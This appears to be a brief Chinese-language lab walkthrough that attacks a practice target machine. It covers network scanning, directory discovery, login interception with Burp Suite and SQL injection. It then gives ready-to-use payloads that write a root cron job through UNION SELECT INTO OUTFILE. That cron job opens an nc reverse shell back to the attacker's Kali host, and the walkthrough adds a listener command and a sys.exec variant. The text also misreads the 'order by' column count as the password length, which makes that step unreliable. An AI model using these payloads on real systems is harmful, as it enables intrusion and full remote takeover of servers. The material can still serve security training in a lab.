扫描靶机
netdiscover -r 靶机IP网段
nmap -sV 靶机IP
发现了80端口,可能存在网页
我们通过dirb对靶机进行隐藏网页进行探查
dirb http://靶机IP:端口
发现一个网页打开
需要用户名和密码
我们优先进行弱密码和判断是否存在注入点
启动burpsuite,修改设置
创建监听端口
进入burpsuite,修改监听端口或者创建add
开启监听
输入用户和密码,把数据导入到Repeater
判断是否存在注入点
发现密码处出现明显的改变,存在注入点。
当我们找到注入点,可以进行字符串猜解长度可以理解为是按照一列一列的查看密码的长度。
‘order by 4# 报错
‘order by 3#页面正常
说明密码存在3个字节
设定定时任务反弹shell
‘union select “”,””,”* * * * * root /usr/bin/nc.traditional kail的IP 监听端口 –c /bin/sh ” into outfile “/etc/cron.d/666”#
解析* * * * *分别对应 分 时 日 月 周
这里利用的linux的系统定时任务
开启监听!!
一定要监听
nc -nlvp 监听端口等待一分钟后回弹。默认五个*是一分钟
直接连接
通过sys.exec命令来执行命令。
‘union select “”,””,”sys.exec(/usr/bin/nc.traditional –c /bin/sh kail的IP 监听端口)”#